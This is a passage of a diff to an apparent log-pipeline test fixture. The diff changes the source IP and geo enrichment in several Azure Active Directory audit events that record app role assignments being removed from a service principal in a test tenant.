\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124899400Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -2653,25 +2419,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -2685,7 +2433,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -2821,7 +2569,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -2833,12 +2581,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036147Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124905900Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -2864,25 +2612,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -2896,7 +2626,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -3032,7 +2762,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -3044,12 +2774,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036153100Z", - "original": 